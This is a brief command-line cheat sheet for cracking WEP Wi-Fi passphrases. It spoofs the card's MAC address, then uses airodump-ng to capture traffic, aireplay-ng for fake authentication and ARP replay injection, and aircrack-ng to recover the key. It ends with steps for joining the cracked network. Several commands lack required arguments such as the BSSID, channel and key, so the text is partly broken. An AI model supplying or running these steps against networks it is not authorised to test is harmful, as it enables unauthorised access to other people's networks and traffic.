How to crack WEP Wifi Network Passphrases

Open first shell

iwconfig // (lets assume your wifi card name is wlan0)
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0

airodump-ng -c -w --bssid wlan0


Open second shell

aireplay-ng -1 0 -a -h 00:11:22:33:44:55 -e wlan0
aireplay-ng -3 -b -h 00:11:22:33:44:55 wlan0

Open third shell
aircrack-ng -b


After password cracked 

sudo vim /etc/hostname or hostname
iwconfig wlan0 mode managed key
iwconfig wlan0 essid
dhclient wlan0
ping google.com
route -n